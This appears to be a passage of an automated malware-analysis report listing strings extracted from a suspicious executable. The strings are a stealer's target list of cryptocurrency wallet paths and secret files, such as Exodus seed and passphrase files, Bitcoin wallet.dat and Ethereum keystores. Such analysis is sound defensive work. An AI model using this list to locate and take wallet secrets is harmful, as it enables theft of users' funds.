Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\seed.seco*
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\info.secon
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\seed.seco*
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\.z
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\seed.seco*
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\seed.seco*
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi 